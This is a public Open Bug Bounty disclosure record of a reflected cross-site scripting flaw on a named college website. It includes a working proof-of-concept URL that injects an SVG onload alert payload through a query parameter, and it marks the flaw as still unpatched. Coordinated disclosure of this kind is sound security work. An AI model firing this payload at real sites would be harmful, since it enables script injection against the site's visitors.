kmcollege.com XSS vulnerability

2017-10-13T01:51:00
ID OBB:336710
Type openbugbounty
Reporter SonnySpooks
Modified 2018-01-11T02:21:00

Description

Vulnerable URL:
http://www.kmcollege.com/viewgallery4.jsp?&topic;=I.A.%20NOTICE&pby;=admin&msg;=%22%3E%3Csvg/onload=alert(/XSSPOSED/)%3EThe%20Internal%20Assessment%20marks%20of%20students%20have%20been%20displayed%20on%20the%20College%20notice%20board.%20Students%20are%20requested%20to%20check%20their%20details%20and%20in%20cases%20of%20discrepancies,%20contact%20Mr.%20Sanjeet%20Kumar%20Singh%20in%20the%20Central%20Computer%20Lab%20so%20that%20his/her%20objection%20can%20be%20sent%20to%20the%20Internal%20Assessment%20Committee%20of%20the%20College%20for%20necessary%20action%20latest%20by%20May%2017,%202012.%20No%20complaint%20will%20be%20entertained%20after%20the%20aforesaid%20date.&image1;=&image2;=&image3;=&image4;=&image5;=&image6;=&image7;=&image8;=&image9;=&image10;=&ATT;=1127110520121755131.A.%20NOTICE.pdf
Details:

Description | Value
---|---
Patched: | No
Latest check for patch: | 11.01.2018
Vulnerability type: | XSS
Vulnerability status: | Publicly disclosed
Alexa Rank: | 19341878
VIP website status: | No

Coordinated Disclosure Timeline:

Description | Value
---|---
Vulnerability submitted via Open Bug Bounty | 13 October, 2017 01:51 GMT
Generic security notifications sent to website owner | 13 October, 2017 01:54 GMT
Notification sent to subscribers (without technical details) | 13 October, 2017 02:17 GMT
Vulnerability details disclosed by researcher | 11 January, 2018 02:21 GMT